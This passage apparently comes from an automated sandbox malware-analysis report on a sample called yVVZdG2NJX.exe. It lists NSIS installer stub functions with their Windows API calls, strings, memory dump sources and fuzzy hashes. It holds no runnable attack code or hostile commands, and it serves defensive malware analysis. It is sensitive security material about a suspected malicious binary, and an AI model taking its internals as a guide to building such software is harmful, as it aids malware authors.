                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                      • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                      • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                      • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                      Function 00405C17 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405C25
                                                                      • CharNextW.USER32(00000000), ref: 00405C2A
                                                                      • CharNextW.USER32(00000000), ref: 00405C42
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsg9061.tmp, xrefs: 00405C18
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp
                                                                      • API String ID: 3213498283-677182141
                                                                      • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                      • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                      • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                      • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                      Function 00405B6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-2145255484
                                                                      • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                      • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                      • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                      • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                      Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Close$Enum
                                                                      • String ID:
                                                                      • API String ID: 464197530-0
                                                                      • Opcode ID: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                      • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                      • Opcode Fuzzy Hash: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                      • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                      Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                      • GetTickCount.KERNEL32 ref: 00402EAA
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                      • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                      • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                      • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                      Function 00405C74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405C25
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405CCD
                                                                      • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420), ref: 00405CDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp
                                                                      • API String ID: 3248276644-677182141
                                                                      • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                      • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                      • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                      • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                      Function 00406165 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063D9,80000002), ref: 004061AB
                                                                      • RegCloseKey.ADVAPI32(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 004061B6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID: Call
                                                                      • API String ID: 3356406503-1824292864
                                                                      • Opcode ID: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                      • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                      • Opcode Fuzzy Hash: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                      • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                      Function 00405880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                      • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                      Strings
                                                                      • Error launching installer, xrefs: 00405893
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                      • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                      • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                      • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                      Function 004038F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D3420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                      • GlobalFree.KERNEL32(008BD968), ref: 00403913
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-2145255484
                                                                      • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                      • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                      • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                      • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                      Function 00405BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yVVZdG2NJX.exe,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yVVZdG2NJX.exe,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-3080008178
